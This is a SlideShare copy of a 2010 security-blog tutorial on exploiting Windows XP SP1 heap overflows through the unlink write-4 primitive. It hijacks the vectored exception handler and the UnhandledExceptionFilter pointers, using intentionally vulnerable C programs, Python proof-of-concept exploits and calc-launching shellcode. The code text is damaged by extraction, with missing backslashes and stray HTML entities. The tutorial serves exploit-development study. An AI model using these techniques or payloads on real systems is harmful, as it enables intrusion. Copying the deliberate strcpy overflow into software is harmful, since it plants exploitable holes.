Location via proxy:   [ UP ]  
[Report a bug]   [Manage cookies]                
SlideShare a Scribd company logo

Heap overflows for humans – 101

C
Craft Symbol

This document discusses exploiting heap overflows on Windows XP using vectored exception handling. It begins by explaining how the Windows heap works and how heap overflow vulnerabilities can be used to arbitrarily overwrite memory. It then presents a proof-of-concept C program that triggers a heap overflow and calls an exception handler. By overwriting pointers in the vectored exception handling data structures, execution can be redirected to shellcode placed in the heap buffer. The document provides step-by-step instructions for analyzing the vulnerability in a debugger, calculating offsets, and crafting an exploit to launch calc.exe via the heap overflow.

1 of 12
Download to read offline
1 mr_me's IT security blog Exploiting, Reversing, Fuzzing, Code Analysis and Web Application Security Heap Overflows For Humans – 101 mr_me · Sunday, October 24th, 2010 We have talked previously about stack based buffer overflows and format strings vulnerabilities. Now it is time to take it a step further and play with the windows heap manager! Unlink() to execute a write 4 primitive Previously, with stack overflows, we have gained control of the execution pointer (EIP) some how whether that be through the exception handler or directly. Today we are going to discuss a series of techniques that have been tried and tested in time that gain control of execution without directly using EIP or SEH. By overwriting at a location in memory of our choice, with a controlled value, we are able to achieve an arbitary DWORD overwrite. If you are unfamilair with stack based buffer overflows to an intermediate/advanced level then it is suggested that you focus in this area first. What we are about to cover, has been dead and buried for a while, so if you are looking for newer techniques to exploit the windows heap manager, dont stick around What you will need: Windows XP with just sp1 installed.q A debugger (Olly Debugger, Immunity Debugger, windbg etc).q A c/c++ compilier (Dev C++, lcc-32, MS visual C++ 6.0 (if you can still get it)).q A scripting language of ease (I use python, maybe you can use perl).q A brain (and/or persistance).q Some knowledge of Assembly, C and knowledge on how to dig through a debuggerq HideDbg under Olly Debugger (plugin) or !hidedebug under immunity debuggerq Time.q We are going to focus on the core basics and fundementals. The techniques presented will most probably be too old to use in the “real world” however it must always be reminded that if you want to move forward, one must know the past. And learn from it. Ok lets begin! What is the heap and how does it work under XP? mr_me's IT security blog - 1 / 12 - 10.01.2011
2 The heap is a storage of area where a process can store data. Each process dynamically allocates and deallocates heap memory based on the requirements of the application and are globally accessible. It is important to point out that the stack grows towards 0×00000000 and yet the heap grows towards 0xFFFFFFFF. This means that if a process was to call HeapAllocate() twice, the second call would return a pointer that is higher than the first. Therefore any overflow of the first block will overflow into the second block. Every process whether its the default process heap or a dynamically allocated heap will contain multiple data structures. One of those data structures is an array of 128 LIST_ENTRY structures that keeps track of free blocks. This is known as the FreeLists. Each list entry holds two pointers and the beginning of this array can be found at offset 0×178 bytes into the heap structure. When a heap is created, two pointers which point to the first free block of memory available for allocation are set at FreeLists[0]. At the address that these two pointers point to (The beginning of the first available block) are two pointers that point to FreeLists[0]. Let that sink in, and then think about this. Assuming we have a heap with a base address of 0×00650000 and the first availble block is located at 0×00650688 then we can assume the following four addresses: At address 0×00650178 (Freelist[0].Flink) is a pointer with the value of 0×006506881. (Our first free block) A address 0x006517c (FreeList[0].Blink) is a pointer with the value of 0×00650688 (Our2. first free block) At address 0×00650688 (Our first free block) is a pointer with the value of 0×006501783. (FreeList[0]) At address 0x0065068c (Our first free block) is a pointer with the value of 0×006501784. (FreeList[0]) When an allocation occurs, the FreeList[0].Flink and FreeList[0].Blink pointers are updated to point to the next free block that will be allocated. Furthermore the two pointers that point back to the FreeList are moved to the end of the newly allocated block. Every allocation or free, these pointers are updated. Therefore, these allocations are tracked in a doubly linked list. When a heap buffer is overflowed into the heap control data, the updating of these pointers allows the arbitrary dword overwrite. An attacker at this point has the opportunity to modify program control data such as function pointers and thus gain control of the processes path of execution. Exploiting Heap Overflows using Vectored Exception Handling First, lets begin with our heap-veh.c code: mr_me's IT security blog - 2 / 12 - 10.01.2011
3 <br /> #include &lt;windows.h&gt;<br /> #include &lt;stdio.h&gt;</p> <p> DWORD MyExceptionHandler(void);<br /> int foo(char *buf);</p> <p> int main(int argc, char *argv[])<br /> {<br /> HMODULE l;<br /> l = LoadLibrary(&quot;msvcrt.dll&quot;);<br /> l = LoadLibrary(&quot;netapi32.dll&quot;);<br /> printf(&quot;nnHeapoverflow program.n&quot;);<br /> if(argc != 2)<br /> return printf(&quot;ARGS!&quot;);<br /> foo(argv[1]);<br /> return 0;<br /> }</p> <p> DWORD MyExceptionHandler(void)<br /> {<br /> printf(&quot;In exception handler....&quot;);<br /> ExitProcess(1);<br /> return 0;<br /> }</p> <p> int foo(char *buf)<br /> {<br /> HLOCAL h1 = 0, h2 = 0;<br /> HANDLE hp;</p> <p> __try{<br /> hp = HeapCreate(0,0x1000,0x10000);<br /> if(!hp){<br /> return printf(&quot;Failed to create heap.n&quot;);< br /> }<br /> h1 = HeapAlloc(hp,HEAP_ZERO_MEMORY,260);</p> <p> printf(&quot;HEAP: %.8X %.8Xn&quot;,h1,&amp;h1);</p> <p> // Heap Overflow occurs here:<br /> strcpy(h1,buf);</p> <p> // This second call to HeapAlloc() is when we gain con trol<br /> h2 = HeapAlloc(hp,HEAP_ZERO_MEMORY,260);<br /> printf(&quot;hello&quot;);<br /> }<br /> __except(MyExceptionHandler())<br /> {<br /> printf(&quot;oops...&quot;);<br /> }<br /> return 0;<br /> } mr_me&#039;s IT security blog - 3 / 12 - 10.01.2011
4 From the above code, we can see that their will be exception handling due to the __try block statement. Begin by compiling the code with your favourite ompiler under Windows XP SP1. Run the application on the command line, notice how it takes over 260 bytes as an argv and the exception handler kicks in. Now of course when we run this in the debugger, we gain control of the second allocation (because freelist[0] is being updated with our attack string from the first allocation). Look: MOV DWORD PTR DS:[ECX],EAX MOV DWORD PTR DS:[EAX+4],ECX These instructions are saying “Make the current value of EAX the pointer of ECX and make the current value of ECX the value of EAX at the next 4 bytes”. From this we know we are unlinking or freeing of the first allocated memory block. So essentially it means: EAX (what we write) : Blink1. ECX (location of where to write) : Flink2. So what is the vectored exception handling? vectored exception handling was introduced to windows XP when it was first released and stores exception registration structures on the heap. Unlike traditional frame exception handling such as SEH that stores its structure on the stack. This type of exception is called before any other frame based exception handling, The following struture dispicts the layout: struct _VECTORED_EXCEPTION_NODE<br /> {<br /> DWORD m_pNextNode;<br /> mr_me&#039;s IT security blog - 4 / 12 - 10.01.2011
5 DWORD m_pPreviousNode;<br /> PVOID m_pfnVectoredHandler;<br /> } All that you need to know is that the m_pNextNode points to the next _VECTORED_EXCEPTION_NODE structure therefore we must overwrite the pointer to _VECTORED_EXCEPTION_NODE (m_pNextNode) with our fake pointer. But what do we overwrite it with? lets take a look at the code that is responsible for dispatching the _VECTORED_EXCEPTION_NODE: 77F7F49E 8B35 1032FC77 MOV ESI,DWORD PTR DS:[77FC3210] 77F7F4A4 EB 0E JMP SHORT ntdll.77F7F4B4 77F7F4A6 8D45 F8 LEA EAX,DWORD PTR SS:[EBP-8] 77F7F4A9 50 PUSH EAX 77F7F4AA FF56 08 CALL DWORD PTR DS:[ESI+8] so we MOV the pointer of _VECTORED_EXCEPTION_NODE into ESI and then shortly after we call ESI + 8. If we set the next pointer of _VECTORED_EXCEPTION_NODE to our a pointer of our shellcode – 0×08, then we should land very neatly into our buffer. Where do we find a pointer to our shellcode? Well there is one on the stack :0) see: We can see our pointer to our shellcode on the stack. Ok no stress, lets use this hardcoded value 0x0012ff40. Except remember the call esi+8? well lets make sure we hit right on target for our shellcode so 0x0012ff40 – 0×08 = 0x0012ff38. Excellant so ECX is going to be set to 0x0012ff38. How do we find the m_NextNode (pointer to next _VECTORED_EXCEPTION_NODE)? Well in Olly (or immunity debugger) we can parse our exception so far using shift+f7 and try and continue the through the code. The code will setup for the call to the first _VECTORED_EXCEPTION_NODE and as such will reveal the pointer at: 77F60C2C BF 1032FC77 MOV EDI,ntdll.77FC3210 77F60C31 393D 1032FC77 CMP DWORD PTR DS:[77FC3210],EDI 77F60C37 0F85 48E80100 JNZ ntdll.77F7F485 You can see that the code is moving the m_pNextNode (our pointer that we need) into EDI. Excellant, lets set EAX to that value. mr_me&#039;s IT security blog - 5 / 12 - 10.01.2011
6 So as it stands, we have the following values set: ECX = 0x77fc3210 EAX = 0x0012ff38 But of course we need our offsets to EAX and ECX, so we just create an MSF pattern and feed it into the application. Here is a quick reminder for your viewing pleasure: Step 1 – Create msf pattern. Step 2 – Feed it to the target application Step 3 – Calculate offsets by turning on anti-debugging and triggering the exception Ok so here is a skeleton PoC exploit: <br /> import os<br /> # _vectored_exception_node<br /> mr_me&#039;s IT security blog - 6 / 12 - 10.01.2011
7 exploit = (&quot;xcc&quot; * 272)<br /> # ECX pointer to next _VECTORED_EXCEPTION_NODE = 0x77fc3210 - 0x04<br /> # due to second MOV writes to EAX+4 == 0x77fc320c<br /> exploit += (&quot;x0cx32xfcx77&quot;) # ECX<br /> # EAX ptr to shellcode located at 0012ff40 - 0x8 == 0012ff38<br /> exploit += (&quot;x38xffx12&quot;) # EAX - we dont need the null b yte<br /> os.system('&quot;C:Documents and SettingsSteveDesktopodbg110 OLLYDBG.EXE&quot; heap-veh.exe ' + exploit)<br /> Now at this stage we cannot have shellcode after our ECX instruction because it contains a null byte, you may remember this from my previous tutorial Debugging an SEH 0day. This may not always be the case as in this example we are using a strcpy to store our buffer in the heap. Ok so at this point we hit out software breakpoints at “xcc” and can simply replace this with some shellcode. The shellcode must not be more than 272 bytes as this is the only spot to place our shellcode. <br /> # _vectored_exception_node<br /> import os<br /> import win32api<br /> calc = (&quot;xdaxcbx2bxc9xd9x74x24xf4x58xb1x32xbbxfaxc d&quot; +<br /> &quot;x2dx4ax83xe8xfcx31x58x14x03x58xeex2fxd8xb6&quot; +<br /> &quot;xe6x39x23x47xf6x59xadxa2xc7x4bxc9xa7x75x5c&quot; +<br /> &quot;x99xeax75x17xcfx1ex0ex55xd8x11xa7xd0x3ex1f&quot; +<br /> &quot;x38xd5xfexf3xfax77x83x09x2ex58xbaxc1x23x99&quot; +<br /> &quot;xfbx3cxcbxcbx54x4ax79xfcxd1x0ex41xfdx35x05&quot; +<br /> &quot;xf9x85x30xdax8dx3fx3ax0bx3dx4bx74xb3x36x13&quot; +<br /> &quot;xa5xc2x9bx47x99x8dx90xbcx69x0cx70x8dx92x3e&quot; +<br /> &quot;xbcx42xadx8ex31x9axe9x29xa9xe9x01x4ax54xea&quot; +<br /> &quot;xd1x30x82x7fxc4x93x41x27x2cx25x86xbexa7x29&quot; +<br /> &quot;x63xb4xe0x2dx72x19x9bx4axffx9cx4cxdbxbbxba&quot; +<br /> &quot;x48x87x18xa2xc9x6dxcfxdbx0axc9xb0x79x40xf8&quot; +<br /> mr_me&#039;s IT security blog - 7 / 12 - 10.01.2011
8 &quot;xa5xf8x0bx97x38x88x31xdex3ax92x39x71x52xa3&quot; +<br /> &quot;xb2x1ex25x3cx11x5bxd9x76x38xcax71xdfxa8x4e&quot; +<br /> &quot;x1cxe0x06x8cx18x63xa3x6dxdfx7bxc6x68xa4x3b&quot; +<br /> &quot;x3ax01xb5xa9x3cxb6xb6xfbx5ex59x24x67xa1x93&quot;) </p> <p>exploit = (&quot;x90&quot; * 5)<br /> exploit += (calc)<br /> exploit += (&quot;xcc&quot; * (272-len(exploit)))<br /> # ECX pointer to next _VECTORED_EXCEPTION_NODE = 0x77fc3210 - 0x04<br /> # due to second MOV writes to EAX+4 == 0x77fc320c<br /> exploit += (&quot;x0cx32xfcx77&quot;) # ECX<br /> # EAX ptr to shellcode located at 0012ff40 - 0x8 == 0012ff38<br /> exploit += (&quot;x38xffx12&quot;) # EAX - we dont need the null b yte<br /> win32api.WinExec(('heap-veh.exe %s') % exploit, 1)<br /> Exploiting Heap Overflows using the Unhandled Exception Filter The Unhandler Exception Filter is the last exception to be called before an application closes. It is responsible for dispatching of the very common message “An unhandled error occured” when an application suddenly crashes. Up until this point, we have gotten to the stage of controlling EAX and ECX and knowing the offset location to both registers: <br /> import os<br /> exploit = (&quot;xcc&quot; * 272)<br /> exploit += (&quot;x41&quot; * 4) # ECX<br /> exploit += (&quot;x42&quot; * 4) # EAX<br /> exploit += (&quot;xcc&quot; * 272)<br /> os.system('&quot;C:Documents and SettingsSteveDesktopodbg110 OLLYDBG.EXE&quot; heap-uef.exe ' + exploit)<br /> Unlike the previous example, our heap-uef.c file contains no traces of a custom exception handler defined. This means we are going to exploit the application using Microsofts default Unhandled Exception Filter. Below is the heap-uef.c file: <br /> #include &lt;stdio.h&gt;<br /> #include &lt;windows.h&gt;</p> <p> int foo(char *buf);<br /> int main(int argc, char *argv[])<br /> {<br /> mr_me&#039;s IT security blog - 8 / 12 - 10.01.2011
9 HMODULE l;<br /> l = LoadLibrary(&quot;msvcrt.dll&quot;);<br /> l = LoadLibrary(&quot;netapi32.dll&quot;);<br /> printf(&quot;nnHeapoverflow program.n&quot;);<br /> if(argc != 2)<br /> return printf(&quot;ARGS!&quot;);<br /> foo(argv[1]);<br /> return 0;<br /> }</p> <p> int foo(char *buf)<br /> {<br /> HLOCAL h1 = 0, h2 = 0;<br /> HANDLE hp;</p> <p> hp = HeapCreate(0,0x1000,0x10000);<br /> if(!hp)<br /> return printf(&quot;Failed to create heap.n&quot;);<br / > h1 = HeapAlloc(hp,HEAP_ZERO_MEMORY,260);<br /> printf(&quot;HEAP: %.8X %.8Xn&quot;,h1,&amp;h1);</p> <p> // Heap Overflow occurs here:<br /> strcpy(h1,buf);</p> <p> // We gain control of this second call to HeapAlloc<br /> h2 = HeapAlloc(hp,HEAP_ZERO_MEMORY,260);<br /> printf(&quot;hello&quot;);<br /> return 0;<br /> }<br /> When debugging this type of overflow, its important to turn anti debugging on within Olly or Immunity Debugger so that our Exception Filter is called and offsets are at the correct location. Ok so first of all, we must find where we are going to write our dword too. This would be the pointer to Unhandled Exception Filter. This can be found by going looking at the code at SetUnhandledExceptionFilter(). It can be see that a MOV instruction uses a pointer to UnhandledExceptionFilter (0x77ed73b4): mr_me&#039;s IT security blog - 9 / 12 - 10.01.2011
10 So at this point, we can saftley say that ECX will contain the value 0x77c3bbad. But now what are we going to write? lets take a look at what happens when the UnhandledExceptionFilter is called: 77E93114 A1 B473ED77 MOV EAX,DWORD PTR DS:[77ED73B4] 77E93119 3BC6 CMP EAX,ESI 77E9311B 74 15 JE SHORT kernel32.77E93132 77E9311D 57 PUSH EDI 77E9311E FFD0 CALL EAX Basically, the pointer to UnhandledExceptionFilter() is parsed into EAX and a push EDI, then call EAX executes. Similar to Vectored Exception Handling (except the complete opposite ), we can overwrite the pointers value. This pointer will then point to our shellcode, or an instruction that will get us back to our shellcode. If we take a look at EDI, we will notice a pointer after 0×78 bytes to the bottom of our payload (8 bytes off the bottom of our payload). So if we simply call this pointer, we will be executing our shellcode. Therefore we need an instruction in EAX such as: call dword ptr ds:[edi+74] This instruction is easily found in many MS modules under XP sp1. So then lets fill in these values into our PoC and see where we land: <br /> import os<br /> mr_me&#039;s IT security blog - 10 / 12 - 10.01.2011
11 exploit = (&quot;xcc&quot; * 272)<br /> exploit += (&quot;xadxbbxc3x77&quot;) # ECX 0x77C3BBAD --&gt; cal l dword ptr ds:[EDI+74]<br /> exploit += (&quot;xb4x73xedx77&quot;) # EAX 0x77ED73B4 --&gt; Unh andledExceptionFilter()<br /> exploit += (&quot;xcc&quot; * 272)<br /> os.system('&quot;C:Documents and SettingsSteveDesktopodbg110 OLLYDBG.EXE&quot; heap-uef.exe ' + exploit)<br /> Of course we simply calculate the offset to this part of the shellcode and insert our JMP instruction code and insert our shellcode: <br /> import os</p> <p>calc = (&quot;x33xC0x50x68x63x61x6Cx63x54x5Bx50x53xB9 &quot;<br /> &quot;x44x80xc2x77&quot; # address to WinExec()<br /> &quot;xFFxD1x90x90&quot;)</p> <p>exploit = (&quot;x44&quot; * 264)<br /> exploit += &quot;xebx14&quot; # our JMP (over the junk and into nop s)<br /> exploit += (&quot;x44&quot; * 6)<br /> exploit += (&quot;xadxbbxc3x77&quot;) # ECX 0x77C3BBAD --&gt; cal l dword ptr ds:[EDI+74]<br /> exploit += (&quot;xb4x73xedx77&quot;) # EAX 0x77ED73B4 --&gt; Unh andledExceptionFilter()<br /> exploit += (&quot;x90&quot; * 21)<br /> exploit += calc</p> <p>os.system('heap-uef.exe ' + exploit)<br /> Boom ! mr_me&#039;s IT security blog - 11 / 12 - 10.01.2011
12 Conclusion: We have demonstrated two techniques for exploiting unlink() in its most primitive form under windows XP sp1. Other techniques can also apply such as RtlEnterCriticalSection or TEB Exception Handler exploitation in the same situation. Following on from here we will present exploiting Unlink() (HeapAlloc/HeapFree) under Windows XP sp2 and 3 and bypass windows protections against the heap. PoC’s: http://www.exploit-db.com/exploits/12240/q http://www.exploit-db.com/exploits/15957/q References: The shellcoder’s handbook (Chris Anley, John Heasman, FX, Gerardo Richarte)1. David Litchfield2. (http://www.blackhat.com/presentations/win-usa-04/bh-win-04-litchfield/bh-win-04-litchf ield.ppt) This entry was posted on Sunday, October 24th, 2010 at 2:30 pm and is filed under exploit development You can follow any responses to this entry through the Comments (RSS) feed. You can leave a response, or trackback from your own site. mr_me&#039;s IT security blog - 12 / 12 - 10.01.2011

More Related Content

What's hot

When AES(☢) = ☠ - Episode V
When AES(☢) = ☠ - Episode VWhen AES(☢) = ☠ - Episode V
When AES(☢) = ☠ - Episode V
Ange Albertini
 
C++11 smart pointer
C++11 smart pointerC++11 smart pointer
C++11 smart pointer
Lei Yu
 
OpenGL ES 3 Reference Card
OpenGL ES 3 Reference CardOpenGL ES 3 Reference Card
OpenGL ES 3 Reference Card
The Khronos Group Inc.
 
Smart pointers
Smart pointersSmart pointers
Smart pointers
Vishal Mahajan
 
Smart Pointers
Smart PointersSmart Pointers
Smart Pointers
Roman Okolovich
 
Test2 Sum05
Test2 Sum05Test2 Sum05
Test2 Sum05
guestc66a38
 
Catch and throw blocks
Catch and throw blocksCatch and throw blocks
Catch and throw blocks
ashrafkhan12345
 
Checking Intel IPP Samples for Windows - Continuation
Checking Intel IPP Samples for Windows - ContinuationChecking Intel IPP Samples for Windows - Continuation
Checking Intel IPP Samples for Windows - Continuation
PVS-Studio
 
Boost.Interfaces
Boost.InterfacesBoost.Interfaces
Boost.Interfaces
melpon
 
JSUG - Effective Java Puzzlers by Christoph Pickl
JSUG - Effective Java Puzzlers by Christoph PicklJSUG - Effective Java Puzzlers by Christoph Pickl
JSUG - Effective Java Puzzlers by Christoph Pickl
Christoph Pickl
 
What's New in C++ 11/14?
What's New in C++ 11/14?What's New in C++ 11/14?
What's New in C++ 11/14?
Dina Goldshtein
 
PVS-Studio delved into the FreeBSD kernel
PVS-Studio delved into the FreeBSD kernelPVS-Studio delved into the FreeBSD kernel
PVS-Studio delved into the FreeBSD kernel
PVS-Studio
 
PHP - Web Development
PHP - Web DevelopmentPHP - Web Development
PHP - Web Development
Niladri Karmakar
 
Smart Pointers in C++
Smart Pointers in C++Smart Pointers in C++
Smart Pointers in C++
Francesco Casalegno
 
Why Learn Python?
Why Learn Python?Why Learn Python?
Why Learn Python?
Christine Cheung
 
Java Basics - Part1
Java Basics - Part1Java Basics - Part1
Java Basics - Part1
Vani Kandhasamy
 
شرح مقرر البرمجة 2 لغة جافا - الوحدة الرابعة
شرح مقرر البرمجة 2 لغة جافا - الوحدة الرابعةشرح مقرر البرمجة 2 لغة جافا - الوحدة الرابعة
شرح مقرر البرمجة 2 لغة جافا - الوحدة الرابعة
جامعة القدس المفتوحة
 
شرح مقرر البرمجة 2 لغة جافا - الوحدة الثالثة
شرح مقرر البرمجة 2 لغة جافا - الوحدة الثالثةشرح مقرر البرمجة 2 لغة جافا - الوحدة الثالثة
شرح مقرر البرمجة 2 لغة جافا - الوحدة الثالثة
جامعة القدس المفتوحة
 
Core java
Core javaCore java
Core java
Uday Sharma
 
Coding Guidelines - Crafting Clean Code
Coding Guidelines - Crafting Clean CodeCoding Guidelines - Crafting Clean Code
Coding Guidelines - Crafting Clean Code
Ganesh Samarthyam
 

What's hot (20)

When AES(☢) = ☠ - Episode V
When AES(☢) = ☠ - Episode VWhen AES(☢) = ☠ - Episode V
When AES(☢) = ☠ - Episode V
 
C++11 smart pointer
C++11 smart pointerC++11 smart pointer
C++11 smart pointer
 
OpenGL ES 3 Reference Card
OpenGL ES 3 Reference CardOpenGL ES 3 Reference Card
OpenGL ES 3 Reference Card
 
Smart pointers
Smart pointersSmart pointers
Smart pointers
 
Smart Pointers
Smart PointersSmart Pointers
Smart Pointers
 
Test2 Sum05
Test2 Sum05Test2 Sum05
Test2 Sum05
 
Catch and throw blocks
Catch and throw blocksCatch and throw blocks
Catch and throw blocks
 
Checking Intel IPP Samples for Windows - Continuation
Checking Intel IPP Samples for Windows - ContinuationChecking Intel IPP Samples for Windows - Continuation
Checking Intel IPP Samples for Windows - Continuation
 
Boost.Interfaces
Boost.InterfacesBoost.Interfaces
Boost.Interfaces
 
JSUG - Effective Java Puzzlers by Christoph Pickl
JSUG - Effective Java Puzzlers by Christoph PicklJSUG - Effective Java Puzzlers by Christoph Pickl
JSUG - Effective Java Puzzlers by Christoph Pickl
 
What's New in C++ 11/14?
What's New in C++ 11/14?What's New in C++ 11/14?
What's New in C++ 11/14?
 
PVS-Studio delved into the FreeBSD kernel
PVS-Studio delved into the FreeBSD kernelPVS-Studio delved into the FreeBSD kernel
PVS-Studio delved into the FreeBSD kernel
 
PHP - Web Development
PHP - Web DevelopmentPHP - Web Development
PHP - Web Development
 
Smart Pointers in C++
Smart Pointers in C++Smart Pointers in C++
Smart Pointers in C++
 
Why Learn Python?
Why Learn Python?Why Learn Python?
Why Learn Python?
 
Java Basics - Part1
Java Basics - Part1Java Basics - Part1
Java Basics - Part1
 
شرح مقرر البرمجة 2 لغة جافا - الوحدة الرابعة
شرح مقرر البرمجة 2 لغة جافا - الوحدة الرابعةشرح مقرر البرمجة 2 لغة جافا - الوحدة الرابعة
شرح مقرر البرمجة 2 لغة جافا - الوحدة الرابعة
 
شرح مقرر البرمجة 2 لغة جافا - الوحدة الثالثة
شرح مقرر البرمجة 2 لغة جافا - الوحدة الثالثةشرح مقرر البرمجة 2 لغة جافا - الوحدة الثالثة
شرح مقرر البرمجة 2 لغة جافا - الوحدة الثالثة
 
Core java
Core javaCore java
Core java
 
Coding Guidelines - Crafting Clean Code
Coding Guidelines - Crafting Clean CodeCoding Guidelines - Crafting Clean Code
Coding Guidelines - Crafting Clean Code
 

Viewers also liked

Baby Shower
Baby ShowerBaby Shower
Baby Shower
Chau Cao
 
Life Sciences Overview Pdf
Life Sciences Overview PdfLife Sciences Overview Pdf
Life Sciences Overview Pdf
DKhan01
 
Yeni Teknolojiler ve Halkla İlişkiler Uygulamaları
Yeni Teknolojiler ve Halkla İlişkiler UygulamalarıYeni Teknolojiler ve Halkla İlişkiler Uygulamaları
Yeni Teknolojiler ve Halkla İlişkiler Uygulamaları
murat bayram
 
2 Danes 3 Internationals - Marketing strategy for startups @ CBS
2 Danes 3 Internationals - Marketing strategy for startups @ CBS 2 Danes 3 Internationals - Marketing strategy for startups @ CBS
2 Danes 3 Internationals - Marketing strategy for startups @ CBS
danieldamian
 
Turizm Uydu Hesapları
Turizm Uydu HesaplarıTurizm Uydu Hesapları
Turizm Uydu Hesapları
murat bayram
 
TDD super mondays-june-2014
TDD super mondays-june-2014TDD super mondays-june-2014
TDD super mondays-june-2014
Alex Kavanagh
 
Greenpeace halkla ilişkiler faaliyetleri
Greenpeace halkla ilişkiler faaliyetleriGreenpeace halkla ilişkiler faaliyetleri
Greenpeace halkla ilişkiler faaliyetleri
murat bayram
 
Halkla İlişkiler Projesi Ödevi
Halkla İlişkiler Projesi ÖdeviHalkla İlişkiler Projesi Ödevi
Halkla İlişkiler Projesi Ödevi
ayetkuru
 

Viewers also liked (8)

Baby Shower
Baby ShowerBaby Shower
Baby Shower
 
Life Sciences Overview Pdf
Life Sciences Overview PdfLife Sciences Overview Pdf
Life Sciences Overview Pdf
 
Yeni Teknolojiler ve Halkla İlişkiler Uygulamaları
Yeni Teknolojiler ve Halkla İlişkiler UygulamalarıYeni Teknolojiler ve Halkla İlişkiler Uygulamaları
Yeni Teknolojiler ve Halkla İlişkiler Uygulamaları
 
2 Danes 3 Internationals - Marketing strategy for startups @ CBS
2 Danes 3 Internationals - Marketing strategy for startups @ CBS 2 Danes 3 Internationals - Marketing strategy for startups @ CBS
2 Danes 3 Internationals - Marketing strategy for startups @ CBS
 
Turizm Uydu Hesapları
Turizm Uydu HesaplarıTurizm Uydu Hesapları
Turizm Uydu Hesapları
 
TDD super mondays-june-2014
TDD super mondays-june-2014TDD super mondays-june-2014
TDD super mondays-june-2014
 
Greenpeace halkla ilişkiler faaliyetleri
Greenpeace halkla ilişkiler faaliyetleriGreenpeace halkla ilişkiler faaliyetleri
Greenpeace halkla ilişkiler faaliyetleri
 
Halkla İlişkiler Projesi Ödevi
Halkla İlişkiler Projesi ÖdeviHalkla İlişkiler Projesi Ödevi
Halkla İlişkiler Projesi Ödevi
 

Similar to Heap overflows for humans – 101

Writing Metasploit Plugins
Writing Metasploit PluginsWriting Metasploit Plugins
Writing Metasploit Plugins
amiable_indian
 
exploiting heap overflows
exploiting heap overflowsexploiting heap overflows
exploiting heap overflows
primelude
 
Exploit Research and Development Megaprimer: DEP Bypassing with ROP Chains
Exploit Research and Development Megaprimer: DEP Bypassing with ROP ChainsExploit Research and Development Megaprimer: DEP Bypassing with ROP Chains
Exploit Research and Development Megaprimer: DEP Bypassing with ROP Chains
Ajin Abraham
 
CyberLink LabelPrint 2.5 Exploitation Process
CyberLink LabelPrint 2.5 Exploitation ProcessCyberLink LabelPrint 2.5 Exploitation Process
CyberLink LabelPrint 2.5 Exploitation Process
Thomas Gregory
 
How to drive a malware analyst crazy
How to drive a malware analyst crazyHow to drive a malware analyst crazy
How to drive a malware analyst crazy
Michael Boman
 
44CON London 2015 - How to drive a malware analyst crazy
44CON London 2015 - How to drive a malware analyst crazy44CON London 2015 - How to drive a malware analyst crazy
44CON London 2015 - How to drive a malware analyst crazy
44CON
 
[CCC-28c3] Post Memory Corruption Memory Analysis
[CCC-28c3] Post Memory Corruption Memory Analysis[CCC-28c3] Post Memory Corruption Memory Analysis
[CCC-28c3] Post Memory Corruption Memory Analysis
Moabi.com
 
Virtual machine re building
Virtual machine re buildingVirtual machine re building
Virtual machine re building
Martin Dominguez Alvarez
 
exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-bas...
exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-bas...exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-bas...
exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-bas...
tutorialsruby
 
exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-bas...
exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-bas...exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-bas...
exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-bas...
tutorialsruby
 
NYU hacknight, april 6, 2016
NYU hacknight, april 6, 2016NYU hacknight, april 6, 2016
NYU hacknight, april 6, 2016
Mikhail Sosonkin
 
Return Oriented Programming (ROP) Based Exploits - Part I
Return Oriented Programming (ROP) Based Exploits - Part IReturn Oriented Programming (ROP) Based Exploits - Part I
Return Oriented Programming (ROP) Based Exploits - Part I
n|u - The Open Security Community
 
SFO15-500: VIXL
SFO15-500: VIXLSFO15-500: VIXL
SFO15-500: VIXL
Linaro
 
Linux Shellcode disassembling
Linux Shellcode disassemblingLinux Shellcode disassembling
Linux Shellcode disassembling
Harsh Daftary
 
EMBEDDED SYSTEMS 4&5
EMBEDDED SYSTEMS 4&5EMBEDDED SYSTEMS 4&5
EMBEDDED SYSTEMS 4&5
PRADEEP
 
Semtex.c [CVE-2013-2094] - A Linux Privelege Escalation
Semtex.c [CVE-2013-2094] - A Linux Privelege EscalationSemtex.c [CVE-2013-2094] - A Linux Privelege Escalation
Semtex.c [CVE-2013-2094] - A Linux Privelege Escalation
Kernel TLV
 
Shellcode Disassembling - Reverse Engineering
Shellcode Disassembling - Reverse EngineeringShellcode Disassembling - Reverse Engineering
Shellcode Disassembling - Reverse Engineering
Sumutiu Marius
 
CarolinaCon 2009 Anti-Debugging
CarolinaCon 2009 Anti-DebuggingCarolinaCon 2009 Anti-Debugging
CarolinaCon 2009 Anti-Debugging
Tyler Shields
 
Low Level Exploits
Low Level ExploitsLow Level Exploits
Low Level Exploits
hughpearse
 
A Unicorn Seeking Extraterrestrial Life: Analyzing SETI@home's Source Code
A Unicorn Seeking Extraterrestrial Life: Analyzing SETI@home's Source CodeA Unicorn Seeking Extraterrestrial Life: Analyzing SETI@home's Source Code
A Unicorn Seeking Extraterrestrial Life: Analyzing SETI@home's Source Code
PVS-Studio
 

Similar to Heap overflows for humans – 101 (20)

Writing Metasploit Plugins
Writing Metasploit PluginsWriting Metasploit Plugins
Writing Metasploit Plugins
 
exploiting heap overflows
exploiting heap overflowsexploiting heap overflows
exploiting heap overflows
 
Exploit Research and Development Megaprimer: DEP Bypassing with ROP Chains
Exploit Research and Development Megaprimer: DEP Bypassing with ROP ChainsExploit Research and Development Megaprimer: DEP Bypassing with ROP Chains
Exploit Research and Development Megaprimer: DEP Bypassing with ROP Chains
 
CyberLink LabelPrint 2.5 Exploitation Process
CyberLink LabelPrint 2.5 Exploitation ProcessCyberLink LabelPrint 2.5 Exploitation Process
CyberLink LabelPrint 2.5 Exploitation Process
 
How to drive a malware analyst crazy
How to drive a malware analyst crazyHow to drive a malware analyst crazy
How to drive a malware analyst crazy
 
44CON London 2015 - How to drive a malware analyst crazy
44CON London 2015 - How to drive a malware analyst crazy44CON London 2015 - How to drive a malware analyst crazy
44CON London 2015 - How to drive a malware analyst crazy
 
[CCC-28c3] Post Memory Corruption Memory Analysis
[CCC-28c3] Post Memory Corruption Memory Analysis[CCC-28c3] Post Memory Corruption Memory Analysis
